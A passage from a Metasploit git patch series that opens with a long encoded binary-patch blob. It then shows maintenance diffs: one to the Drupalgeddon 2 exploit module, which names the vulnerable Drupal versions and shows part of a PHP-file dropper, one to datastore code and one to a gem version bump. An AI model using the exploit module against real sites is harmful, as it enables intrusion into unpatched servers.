zCahVYtaBPs%0fjWvtuKGT*z923Uc=%rK8i}F^e%wQFkf3O=DA&15^sOO{@@6f`lln zT^LiK&^J-oOrR%pTc-3e8+>7zvX~HtkIZ|3e<8L@iI&kTEGWdFg|Jj+`5c3ZCNEcL z?~rn^{$tPx@GBLnNud8es!tdYdtOY4+rDOh#-k5_|t931{;NAyy zFu8~SZ6BLZdF=evDi_b(d$$sc{T|t&TQ}>tv=nQKH79j=I$p!m#-&+PBmt@ldI{iLo_Il2*~`Q9b)tLP1^}4;ws^49gsxH#FN(LD@8CRtofa z)!FrGM}yVkRj)4mu|Z`;#RhBSD-j4u8}Zo|+Lm%_WCav$*`^h5#M+$>d&~0x?ru~u z?@k-QzTgz`1z8wS?q8((TRhlSy}Vsjq2oTK1e8sxS@OSjy~-pPeX5FOJHkpSdfTZD zA*B>?;SFuiV=Kek>nij$lm%l8X+g8ztl}zvsb+i?<5(C>pmX{uKeYZTrNFTioD^zA}Rq)}V zO(T#fm`-_;^OQfjj8$!Z+tr#CC1}0fOUIf4vWix_@W-|7Dr-XNcqsuf6?cJ!$mqp? z*D);AupfBn^`;tX>CTpu|0c>nz2i?DhSP7V;re>oIlUh8@Y<`K)`~cR0lHxys!O1x zdo4fGV6YX{Rh7vvKB30eu~WzN3o4euIYXayLFu7Rq-qntb!JbO|UvUwT%3ln39RTf=1)wZbXUd zXg!NKQaNf-tg_UGW6C2ciBMjGy_V(N?@IZN$X|qooBE0PU=f~(_J1e=y~{SyR@gBz zD|_(BygY|i;v=V)Gh~sk|R_1rB5^YZA6x zp^c`l|E`o*x1_wvqWd0n74zS~C{cw~kWwps6+N9@MGSnj7X|eR>-Qn#?9*$DoF{$U z6qLi#_Z1JWjQO?`oRx#cY(ulLjKEgu*M$j~v|mjKuWu}1S^HHi3#BeqCudg_&18x@ zfX)>)<>&(@nn{ua_wSbj=>B23VtE-M=^#r({g@BOcsMET^sgv|H0k3y$ps@Yz8$Dx z;e*WwEK|Dvu=Ai^X=$(>aTTe^1Dfdh;ouW15D%$VtN^CBj=}ifqypWM3Mf3J#x-DE zAMXs;>s$L^g5h2W7YZeNQ4#qbR@F*}1IlV{@n~ZcS7DX$*Kw6eWvhho*VRVl^jFK{|HC<{!rP+s&pKgBe_Z9W^8|N^`}NGv zPgs5T5;exs=gFl6!-x`mR@db86I;8aM2&U%BvrAf;*)9zll|c3N>W#GJw#%lf+v$W z8VwdH@wBwJFN}vS!!X|1?GMExppr&}wwvwl{!7jrG18YP1}1!?29O0-^eihF9(!e| z!O?PHcyI;bROlRNZ)6E^zshOvO3qH3b80O!JwE!JT|QlPeB@(_cR6L^uN8q>&CGX; zHIYfS6nIFUEi~QA;>8EHDt}Osa2y=MMwj)sV$kmIZ7eFgY`b#7WH>B+lSN)>Va+Fd z)jU|g4;zt{{E9EROWsnL&T~8!wlHEjj=~*SpJg^l;%=4+y|i2T$ZXt4#VlCeZIAMg z*|@Q9E0O3V4L*qhZW^2F2}$3Q@Xbf)CrdO$g?~;ug?}dDC|f`Bdloo(Na+iHoa zn{y_bw98ItD4bibK1=9qZ>cIW1ou061VgWlm~SKTE=m?0&BWBo1~=K;(z}c}WD*St zSvTucv0)E4sy?=|<9s^_^kq#T3@B0qG<>HLW2q|K1A!kRd+5Zp&>HP}6dcP`qb#Wv zNnmjvd?G+M3qjah85{WXI zFQFL5COUhqT)Z>Y8i+qeoWy()zP7H#-fFK~g!he%Z766z@33tZ{uRFik!yceGOdgx zczhWjH(`XugS;qu_`gI|u#qEW622D?U=JoXyvs=Pg#K^hi<`kuFo^_H@IeRNK1$dp zZ>j-$+F^{Hun=Mfyvdu6fw1WOKU6z;=3clIT98H*gz4+l9D zzp!l;hhw%pQ110_Nbewuy zv3Kg3!;YxB86NBsi6R*Z8~0--Y0sxNHBxef zj*^59%OtWGnbaRb0x+u0@r5 zER34=63O@+Ii$Q}x&*2TC0P1BzInNF1fPT!Pf`QRTL`$m9}f>*1i8DHTZ9+nlb5FH zd+iEnDqVv^by(%yoUH(7$E@gm3>ngcL|JuwP=tG}a$ekkvV+BlYrG%ZNTr;>ov@FG zY5VO|jU!Zzft!1k=iy_w;3&|JDMh51&g^zgOlTC4so}o^s5nSYr5sK6#;NEz+mAV; z=HKBcn&KyT1gYAgB=sDu`s-59sL_xbi^U$Ftn#XiNlPkfw5zWFeT)QA`#_Q7%k1jV z4!=aAZqSqj&#yQuLgT@>%gBe>|_kK6Wv z{%-vd)z{LcB3(qBYS0@m3_5|S3;Q}k9N%m8Eo=?=kiE??e92R0Hk`SxlFhWjs$;k@ z707FG9myNwh&*ytjV&itbTyriSJ+2mbLPx7l+wkF*_i!Gee%Y>Is}#ADI0D?61#F* zo~pQ~YfDsHZ#~8=W6G+yOWL#=A;ujq!t~;}>rc}~$$teMSH=C0X$U0C8=}TwEcwxKbVn#TOOIl$OlYCH+BQ=qyM?#0cndl6 z3M^S=8XAC0tI*RbGoiK#Jizm)veq^MvowH~M%ChvDWlDFETbD~^dKo6PrIK$$_=#A zlS&c;c6_&DhCL9Xen6vwl|$t9ora&ctZiW*4@!DpVSOA7z^T_12>E9b-1c%I0D2O? z92>s*L*yxCR2fS8W+C}~tf;WJKX8nfI6$A3!C~{Yx)5_(kl6Mco7b3f&mIzDpHAJT6BTUT|7gLhLHO* zEIFxo2Iv7LTt@jD^Ry-v3H%;Kxl=?7T1f1x@_16%qVuBv|G*2dmAH5~ zd3=)kgw+0D!Ze}wuyF+$VKp!ve|Dr&NEJ+ACkKa!mc)>JMrDSO${3v?-TnuL)FFW% zBcUj>J{S~YZz>!|C(05X6;_+~WbMrLgGzYiC6E%Dz|IbqZI2fTqy)w@u4=_fs%&&_ zr2h}xp!GIktlq}clq=utRL4=T$}vMsP6VyIAqlz4j35CjIP>C@CWVBkVk@N|EAkmg zVUE7?=UrSmDbWdZcd*?1d({%n9#6Glgy-0fp%7zq=#8&Cl0;wUO1QgFOnzRwZ~i~iT(yQ6@R63F{6DOiSQv9%iuW7cS(vmsqmdUQERR?7(^^G>( zW@vRbP^ZJSh+kMEgYC-$Qs-h9Y-6QDN?+j2J5LG*Q7Y4HH852k4*Q8SE`@RN%#io$ zFm{g`PNc{Qm;U2^9DdpIE!=P#RH~w0#^mBh%4VEk8mXiS?CL<9P;E?Nm3Ab?+L)Bv z{68Kr=Ulipj4M@C;q*3CE>G+)#vtwHym^%&7E-4Jm@R$c5Zai;qNlMoEXJH7H9Y_S zIW^{_I@3f8^=oK!)GG3a#Axk2vNV<0*isd=e6**WAVt0C!5TKmEr)arJ9JFh$#IkY|z%q_-pC{r5|F^dIY+f^2!pe+Ryk)|0p`O4$UIRTL3qsRhOb5PqP5ihzJ|WAlds6=hM8 zMG6HKL4|^%2r6&RIrrYAx5;hGkN5uZBk4JFX3or6?wpzLfTLe>)E#@^EX@?A;>ip3 z!D-JqBMjnc=J7`wt*}nl)#n}bd1mlm?9MwlXw`juM>#TAmK6Mb6y|vrjY=-tArNh{mhqA8{i`gSMG{z zOd3E#?j1p*0?5y4uzkBTD$<*!%I+|;ugeD^VDm(zEs7R4 z_CeLdH1E{^6rQSFW|Sj*&y4ky(*(WW#HZH2DhrSJp3IF^E#)3YG--l^6XmF> z;j)Ad>MkO=UKnC#_aANV5fw#cQEFv_`|ijs(v$hR^6GD&cVi>wpl zzW*jn{n;0rZq<99c5wAMbU@*^r@j7OpW24@&=eug?CZq<9DvAO3o#6bW06?i7Z<%5 z5}1!G`<+KQ^)2{R#?LvIN?hFzbq812_W-aYp0|<(@-9@ zqmBwsJUKEU@4_P?t!JE1cUkxx8nvdd$lCj613WT5WTt^Znsd%*c~hYxDr18lQ!!oQ zcQNDjWeUkQ_bw=n_wfiF>L?4EO#LYoRo>uf$@B^JJ~*N=*`PiSm2j1TX`m5#1FR{d zJJzT`MLP7XMAO8WFy(GWC(0uN$x|o{LsFi4(!Nv9^?Sk(tY@A@8k4fB75H}*Qeln)vJMK0Pk6-fU^ z1EE-0xbL0FE_p!I&6E)I5h>-VTnv};rQ8%~m;=Ly*;2_~-hpA5KBOk`RU|0ayMCq5 zaz`D@k`Ch$d*vY{3v(jS|B6jWGUF5yXIwvjgo=;RxuZGEAhnFGz9-juCDu#c_t_AhO7S$w$j`}q5WD9y0Br@KmB_U(tYVI%ZzbQ0{ zhy-zZHR(Eh13nHFWH=a>55u?U=Z<15+1W`5qPyU*Gl#?>?LI6;b@_<=vBT9VSY`n` zVR=nbfl7uOfJH|sFf5^w!a?V?p*ooP9ELpYegk8`boeq4Uw)1MsRP~xORnJv4u(-f z-f>~`F^pcPc`hwr^KlHh>iaV0x#U9CalAQtdK`9hFzXu(2)^QJ0M_Vw= zv-(xx73xRv4l5EW=aP*dUOZ|P5bps&H$Uby(NG=oQU;f2;oJSb;}~%-Ou&EAY9SYo zJ45P~)H1`(9PB*H*hxGb4H>>M4ld!d9v%JFKP6j zYh`XIG>P+0LOnuj&LWHNps1@qe~k*Juq4gp`4c&vx?YIDWkcuB1IfILn@x{zVz+7~ zWWWYsj%Y2?EK<;O0-C}UO94h6QZn|$8HSu9njMLy5T~%U%v&OU$GWu`y9-Y(732_- zUg1WqV3szBz!OREA&$csmq>Svz|)wYDrK;DP_jk~)<{?)o8H8XD7rGRQ>bUnnn5z3 zc2BSntbHUJ-n~%AN2pfP=(5weHJ$q!5hrL-8tWX%UGFIZ2wGi{wpKJiUQFyps262pxmRH?gol_Qe6Gk2_-;$;$No zs;bl(=Xvma^Rem!jZ$Ic3+W=!NAjcnXA z@q!G9=-3=qeB)#lH+@`^Ex?ggPpbf6ompD1CI4IJC8{VNee9%<1tuPMu9RNT+Htf@ ztE=$|=g%xTzqmGnTf9k27H1^a93W#GJ=a|hG zsU`SQwq9uCBH7+dRPX(v;5A{tXo2_$wO+VazP0{L8TZj`;%ecX*bU!%#BLs!N!b4% zfl2Ozzz=IMju~@Zij1LqnDp4S9aAgtZou%fy?4XZzJc4(cQ^Sd zT)8wU1}!QK4sFBf`uAPoDUl-jTxE*;w+g=Q7-XxHC?W}3B52EQp$k-Q7moUvBV6Ix z%eD);WiEl@ThsR6yM&WI+S4)O8P{*lMduI2K0vO~mG^-#TVxnLamcU>PqSRLdB!qU zRQ$8MunG-2(B2|@3+15rW8tC?4v^!`|Z^Y@qKjbMes+5EiFt|^5LxQ-P z#nkAIm#IsVoK-?|4?vlQ0jbi33Fx&J7tz z`qi-wCgBH*8(q4AIIZ&VHFHfUPOJPkAW0^CPlXI}5P%HW>h3^NNkm!3G*D4@7qr#Q zk{h(u{Ts;{;qO<-RRg_M>tTH)OGFf^d%cC~w+XM7|2u@M%(DW*RsNk|qFQS%B7)tZ zhodjxMU0?R_LSSoABt*luE**v;=~2QmOF%Wm040ky1M^BAYJ*6o;rf+chSSFKz4O^ zAjqy_La`e+yN-2aPaTgHo{NV-)|0sDRo^9)S2s_!QC{7DBPg$YK@9=>mkaT=!Cq^0 ziEZNrE3rp?b>=Cr<1PTd)?iHpewBY?=|~C@-4HBp5LmefT*mYxajEsIuS~FdE5e3j z;EG;(rC8Ch5EVD#u$v(T8m#*d#Lrptf}}u~VaTxV4#eRpiq@wgqBXu_U|9FqGB9k0 z{F}TN)b@6EtznZ?VZ`ZK8(dH(MqQzzaPDl|I@TW1Tgn{+#k$9K1I4<3BMCcvi`sHf zK${w%u~HwJv2$l4+$G>xi4#xYSod$l0m~QGmWcXcYkU`#0jo<@0MxML=~*qyUmyd7N^8*@%66c^hVqBn0DbK*`D+ z0`UwpC|UP!#6!$K=3QzAE9-7c@?7r7EQu&87et!sQ%6#Z+nFo#Q)9-7ubD#2%6|sp zaOV5^7R?i8*4>MEp#NV8S%{U>!2kfleOCn4YOhj3S zHsl;gz3b4kGH*m820iQLd_bp$0(#chrOZ15t$P%LKzkQ1XbncARWoBzI;gI6juTyF zS-i?b`y z1{yG=li9QT@PiUhEI!0wkx86_D1zdb42Vj}Fhf01OjF_U6Zkgqh?we57wa%o(Y|8Pg#0g>V02g~LFC z^JRj#bC`yK6%51R@|2f_*{@;xC@IPxw^TUp)2zbu0rmT;|e#E_7CHjaHOJ zVkJ*Y^Zo)A(bev}6m90+wak>f>i{a?%X3&B?1c-cNfNman-3t$uRBE8jqRHa(@&$d zRu95HROhrei366#p3SBg$Bu)jN(3^mIlZAfaK=|viZ!Tw@HOx^R5qpTh9>;*5WeHn zU_kfUu)@|Vp$TFU(zQW5ctXQ1^RLZ4|aUp^MIs$S{cd z=EsqqeN;LD+M^i`7hq%_#an&t0O|t&83Kn3(ZMnO7w3c;w8Eg%=n$NY%T9(b?_)zo zyQNe^fR=jPblLg7f=s_L79Biv(U}H^FXP}ltHq*(z6c&=1SuHYdkR{am$1rx^)+W} zH9^tx4q!jPAj=N0{}1Ob8MKT6;&~q!-^Plr7uIgIU*;x%ZEMMB4gbaYIW-n#>L z!zqwgIunF_iw|@IzQMhs@~A+t{MPmVN>DX}-@ikdX%B=`JV<1o`i+pF)&<`Wa=yYd z>dCwW!tF}r?%|Ob?TFA#%o#J+8z=zhdsp79lizG2^99+esMZ#kVRq;M{22Eq?2ZAvK|DNT({&~CiFBS7#}Ehxky zFBhi4zSM_%k@SiY=Eo;wlat(2g&xls)9ysTQ$jDIvK1Z|^ZH!tqP$xv&?k&z*K4dq z;vP5k^(7#2l_U7{7kE3RS3rCR@La~kRW5#mKG`t&a-YNlr@8`HI2J-{#)PyD$J<9X zIaM=$N>lsrh>`>PJT*B1sF(bO?{M?;rpmEXoH6y56zfwh{xgAHzKxH*`M=^wG@R(u+%3czcT~vAu$iQM5L~Rk0Y!hm@OQemoL2I!I zDS&Pu-(?RnGYvnA-z#<8zN2KnWlbrmg9JYTP0ed@NaA4>4wAZ;Wg}8($#X>#-^l;A zBE$U&7jX3(A&<%XKYSfT$$2w1r{RZ}Fauhl=Oc#%tEpd|8&No1-cIg&Tk-TEj8bSq z<-R-eu>3~yR6{H}25?`pK|Ize3Pz4eaK2(PQ2DGw}LsGFrQG1)Ci|l+HtY4n#1k-UO!i`d0SLL3qJs(@ zdR<&vf%!0+RVXK`Y&LI3FO@KcF#9+!Osq|3w@%2QBKYWS4HhO6Hp+vA6^vgW4f}_% zVGf6gbLXSoo1wxaLNGC`4uV(08NmS&>ICx)!YD#;gFy-@^)d44NMR(Ih=+{AH)lzE4jkufrX%cp*^*A4eC&zrVFpQA@-7I{e*0?%G7)07V5-WVI)~>rn7(v?Y zwg?;4+P!3DVg42%s^UAhFJt7_|cjfACy ztRqP%^i$)rELB)c$R?%i&^~%NXxBgkU#S&kR_le=muq6|HzdN%qh8Y>m&lWyX zYaRuMvv6CxFGrwT&yE~nuS#>+oGX+Ove>REOu0u`sMfe?V_`OF{83}!s#?2KP1vN5 zZYqZ6dKV3zXePWw=!M@au+QIbPbfE&R%g+%^xeI}1Z?N(+FWSEwgVpxKW#y+(v_Ph zq^UNX*OD%C*R7U9cmNf}2gMex+4@@3T3D>sZcrf=+4Xy&@VMH@Tr|uqL|5*bw!&y4 zx}lx$nhIUq%&XgC^WWRCW%T3&Sddz!J?wZ;SVpF*dwawaQEA9ULDhq3CvQI_?4ivr zSd_)r34gc56BcLkLm6lQ^k92H)RF z=q?V<0M&f7+uKNwb9Ar%;CwK;gc0zyEs3PHUwI2Rm83(<)3Y*p1 zwdf`k5e^n~6ORoaoDP2kw_$8|@DZU*jou60g_!bp!BpOH-6B3gUp%>V)R++ywpOkS z_ov;=e<>Hr#%*zCF21~AU0iwI+o{0y*BD_J#|4#_-ZGS1Z#~QV?V^HnMBBv>aJ>4|X zu99(FA`|{mvw}&uofCnjai8E?Lx+>WJoI^$`^2Bf>xy5_4P@K2_fA-!rfd=NU-~L% zgZWyG30mzm@#Pm+1;eWMxG)&8jU%%c45n?IdkS|zRcn0=RByxt_m|B;rf0X z*O)CiA7kY})hApeEclQMVuauS#|*u*{lXwDNfQX2Vm13^p{t=_Dra#uvuN7*XA;fa zNKptaX=Z_+q?yHw^K9+WvJb^-&=TJb(8HN{jjg=sT_aqdqltu1XKS8f(^Bw^<|$1I zA^UPO?_?)QL?iOyhdG+2T$A#uRgsWau8D&a>rv!$FKU)jVi1v{kAuu^HowJ8-F@%FdSj)%{377Kw~~TfE#v+EWGn1M52arINe;w!gap6Ve6qNM^@oV( z{ZL7B{AMw&{5;36qlOyzl%b05l7XMlNVYhR8n}(onDspFF>9{je?GhFXM|-}{6}q?EyMAhp%i?5QkN3(IB0Wxji5aS`GCNf;WB)>3kq?Bjf7SS4sj$+S{Tbs6${W+*}rPjI}=kL6h08+S^cBbL)piWt=f4{?Mo4d*{{75Ve+nd#PtRu^Wv1sXmQLjCwq_&I=&D`|2v!hcO&>yng;ZI-^l;LdTuiDl?@aq6-Jr(M5v7BKavG#1y{2J z5guShfD@{x@H*FJGyiczIQquI=fcUR{4U1UE6w;T_176}ZO#{xt4}CYwBwgB68#_G zk2YjBdw1X;fK_kvL6Fo*XM!EKc!Y)QsGBUyh=F}S2Q+al>7*-Si)zOVg*kyRKHdz* zB3%o3s~<9R_+O;<&MMtHnZ_U(`!^c)_|>}RY&+c0iARbqkq{Km4nk#_0UBQbA|gOsyFfX@YyeJp+spF!TFxJ*@g8 zJQ%M29==54hkFIKj5VaYwqFnTXA5mlkF$#H=FsS*C`g=*pUJQNfi$##hTGw>MG;o` zr;#BDW||FHNzY`M#u%C!W%!U0TK%k&(4Hc@8H&w@pIOtQ7(*jAk3O2NwHVq!`4D8j zOHYFy`j#3(V0DQ>UNy*kRohsnYxo#LIJ?UhELDstt#8lc1ZGaeTWOzCLns_5HP{hb z0@J#~e>DWa!YhX9jJJ?#Lu+>YJ-y8b$w%dzcVl`&Sz*={LoB>}&5#U}SDGnFe^}Ti z@_DUzc|nYZvdBz$sBPp|^um;|S3w#&+7ir|rCik}G8zW8i?qYVQbPnBwipAUS0kex z7PiHsE+fGx9@3i4Bebl zq2zc}GR&-uYQ!Z&#DQoNEDbS-!J=UEKt|$fuz5HeyzL?-iHtv!qT#s^^KX)^;$Dnv z2jMU}bG&PJsCg+f9`8L}vm(qoaU0()DIS7JAm}8-Gh*`X5j43wn_RAoL$`30QtV>3>RB|daFm#HAgPzp4Al{6E|ldHQ_OZ~ejz9r zE+vQPvDBl)cl;#tPa1j{)`xG%e$w2P%|vx&%u%W}=sYs2iR;FhnE$Y;9C}(IKTP-6 zN8#gAzp9u_xKR~T0Bd%JMJ)R|)*o7Z9vcRGDq`Pc`XBXqEbkAq$HivBYlmVjl&v@Z zR*;jXbDnhH3@nDR>tZ9}{?B7W;Jt5S?}vLj$3?)Z+m-7&T(xxGCsd&?ItD=5WNq?UrDex)HN$k&3o`M_0JKJfR8 z&E#A=DlB{1hEuT3=+;e(Y+!#%6LeDEI*CJ#fOx zuGVD8>~7^jx5OF+ofcaI;m{mwILx1Aox&5Ih;%yG^C}ua{w18#40C|lmH)JLBfCWU zpqval=U5$Z-*ZUWdMG{^s@uc`vWc`WvCgIZLD@U_9eH+KoDs73SR!1%F0l?^E6*oU z8z9jYfJ9&2(e*fnHm+y!=UE&fa?boF3kG~Vp6TO2Ii(+EQp ztu`Jy--u%jxlZ1QOJ^p0bY^97&SYz9Kwhz>Y4&luXW1HG6P+n*&VS4M_EYj+-x3RgnmSmf%FCF8MG2^qy zLtfUT@%{1tA!l_wejd!TiRPL(-}VzT*Rj_Xvk&)0`_BHnwz`P4#u4aC&Rfo>`Ok^ zFbXh#gFPM!);Sz7+TnOb9{naF&CGI`U8xC<-`VJqPb(>uT#Pj%aM1vVBNdjcPsC!2 ztsH@n)zT3T-{m>RF!kMElwyJ|6Ewk4($aC9UKqBPDJh*fl4OR7t&q;DbxDy>U5a#8 z_Hk&Tn#1d7(mqQVa6=q;T|j$>Ezj!N=Zp(KXGCRmTdgE{`ci@!t_^jZWt|qR2^Txr zhdUCPL|!}LLI1epeR-Wvgn^&xV!<}sVTEeF!yj%}SOQ%$M>+~sXyCx39j)N8?uiIR z+%<8UM2$NKIkQkzn|dU6b6x0`2uwGo+e+rcZ>B|&2+i(^@$h-~M426K4<+D20<%>6 z3Z$F?br4C1t@YkD~1M_mcc!)s`e?-!8+uNd-(5K6=jD zn&g0a%M&8u*a5Wi1D_?KTZZi0ZT2PgW=8bheC3#xg`sBn;(#RIh9-}d$*f>xTu3I8ZEJtNsig3CRfrk1k0&RkJDIrX_4Sy(y+M+XH^uVT+1Q`Eg+M6)tRGJ(>3aCj!1Q6_pwpq#Q;l?xKTE)w z&B6lhorfcSBDUgT=O8gd$p__|gVGy8Y;pQ@k)fVY&^|p5J}ypwS49$7F*H3M!mp;U zB^+G6p8hG&Q2vwKG4yWvwe)P-cUUjwEd093NZcGp{=h-)zol=Jd#~JuS9sd{^?cUda{vsS?~K(<90FxG5&9VeFP9UsF{7i| zvLBttV0TA-m~4(Q5MMzuE_Pw2$HwCVi}Cahc?UUroEh-sc1-8lO_C=t<0Akz|9}zi zdFL=Bwet^H+g=>!y&s)T*d+N#P{16O9C*AOKdAO?wBUtzqh$>&9A*gxquCq-p`S#W zU3u?V`ZVOrY4>JJF1(l%u;2Y;O1>(buzQJJ=PJt$c$)1xH`gj%K@)e#*J z4>t+J08`>-$!uyu=U5`T+NyF)FHnA6CAp?cY!@#yD86rD=1_DRKHJpP8g{&hj>n9P zybk7{Em8Or()T;VB0XhO3=1 zRDM&rHVjG^YH=6shaq*Pb1*4^>u? zNLvh*yggLlIe`gE|4xf)Y@}1!3$h1euEps2|KBAo(WP66kXmRn7vuMROA3P@z&uAu zFcZma2xGvN8Eb{-f|wk=3FcjMxbiK+jfQQ&OdjLw!l#sI?I2LhFGyts;t(O+lCCU^ z;12tR{tKK@-ZHQ zD}(Uy=&)unNgEWa9s`&%5<+y?7l!N?R@BIOjD(fPRZ}{ny~i+)m(-TsU+=*Si7QU=>G!pO%nnD From 873cbcee27263af5ba3fcd0be4e79ab68fc720d8 Mon Sep 17 00:00:00 2001 From: William Vu Date: Wed, 25 Apr 2018 18:08:38 -0500 Subject: [PATCH 62/65] Fix #9876, minor updates to Drupalgeddon 2 1. Tested versions are already listed in the module doc, and we've tested more than just 7.57 and 8.4.5 now. Removing a source of potential inconsistency in the future. 2. No problem with ivars anymore. No idea what happened, but maybe I was just too tired to code. Removing cleanup method. --- modules/exploits/unix/webapp/drupal_drupalgeddon2.rb | 12 ------------ 1 file changed, 12 deletions(-) diff --git a/modules/exploits/unix/webapp/drupal_drupalgeddon2.rb b/modules/exploits/unix/webapp/drupal_drupalgeddon2.rb index f7e2c09cc9..59bce898c4 100644 --- a/modules/exploits/unix/webapp/drupal_drupalgeddon2.rb +++ b/modules/exploits/unix/webapp/drupal_drupalgeddon2.rb @@ -19,8 +19,6 @@ class MetasploitModule < Msf::Exploit::Remote This module exploits a Drupal property injection in the Forms API. Drupal 6.x, < 7.58, 8.2.x, < 8.3.9, < 8.4.6, and < 8.5.1 are vulnerable. - - Tested on 7.57 and 8.4.5. }, 'Author' => [ 'Jasper Mattsson', # Vulnerability discovery @@ -201,16 +199,6 @@ class MetasploitModule < Msf::Exploit::Remote end end - # XXX: Ivars are being preserved - def cleanup - begin - remove_instance_variable(:@version) - rescue NameError - end - - super - end - def dropper_assert php_file = Pathname.new( "#{datastore['WritableDir']}/#{random_crap}.php" From 9bdba7e23477988dccd6d49ae7fdc637ef48f041 Mon Sep 17 00:00:00 2001 From: Brent Cook Date: Wed, 25 Apr 2018 18:35:45 -0500 Subject: [PATCH 63/65] s/clone/ds/g --- lib/msf/core/data_store.rb | 16 ++++++++-------- 1 file changed, 8 insertions(+), 8 deletions(-) diff --git a/lib/msf/core/data_store.rb b/lib/msf/core/data_store.rb index f9fc740b0c..a2bb02837e 100644 --- a/lib/msf/core/data_store.rb +++ b/lib/msf/core/data_store.rb @@ -223,12 +223,12 @@ class DataStore < Hash # Return a deep copy of this datastore. # def copy - clone = self.class.new + ds = self.class.new self.keys.each do |k| - clone.import_option(k, self[k].kind_of?(String) ? self[k].dup : self[k], @imported[k], @imported_by[k]) + ds.import_option(k, self[k].kind_of?(String) ? self[k].dup : self[k], @imported[k], @imported_by[k]) end - clone.aliases = self.aliases.dup - clone + ds.aliases = self.aliases.dup + ds end # @@ -374,12 +374,12 @@ class ModuleDataStore < DataStore # Return a deep copy of this datastore. # def copy - clone = self.class.new(@_module) + ds = self.class.new(@_module) self.keys.each do |k| - clone.import_option(k, self[k].kind_of?(String) ? self[k].dup : self[k], @imported[k], @imported_by[k]) + ds.import_option(k, self[k].kind_of?(String) ? self[k].dup : self[k], @imported[k], @imported_by[k]) end - clone.aliases = self.aliases.dup - clone + ds.aliases = self.aliases.dup + ds end end From 31563a977c98ac00bbb8a81a82720cf3f3602d25 Mon Sep 17 00:00:00 2001 From: Brent Cook Date: Wed, 25 Apr 2018 18:41:14 -0500 Subject: [PATCH 64/65] use OO rather than duck typing for parameter copying --- lib/msf/core/data_store.rb | 8 +++++--- 1 file changed, 5 insertions(+), 3 deletions(-) diff --git a/lib/msf/core/data_store.rb b/lib/msf/core/data_store.rb index a2bb02837e..13c81aba48 100644 --- a/lib/msf/core/data_store.rb +++ b/lib/msf/core/data_store.rb @@ -236,9 +236,11 @@ class DataStore < Hash # def merge!(other) super - self.aliases.merge!(other.aliases) if other.respond_to?(:aliases) - self.imported.merge!(other.imported) if other.respond_to?(:imported) - self.imported_by.merge!(other.imported_by) if other.respond_to?(:imported_by) + if other.is_a? DataStore + self.aliases.merge!(other.aliases) + self.imported.merge!(other.imported) + self.imported_by.merge!(other.imported_by) + end end # From 67e7f917e7d4851c46a4dde5c8470c551f544e3e Mon Sep 17 00:00:00 2001 From: Metasploit Date: Thu, 26 Apr 2018 10:05:16 -0700 Subject: [PATCH 65/65] Weekly dependency update --- Gemfile.lock | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/Gemfile.lock b/Gemfile.lock index f04af1d0e8..2286d3b6b7 100644 --- a/Gemfile.lock +++ b/Gemfile.lock @@ -209,7 +209,7 @@ GEM coderay (~> 1.1.0) method_source (~> 0.9.0) public_suffix (3.0.2) - rack (1.6.9) + rack (1.6.10) rack-protection (1.5.5) rack rack-test (0.6.3)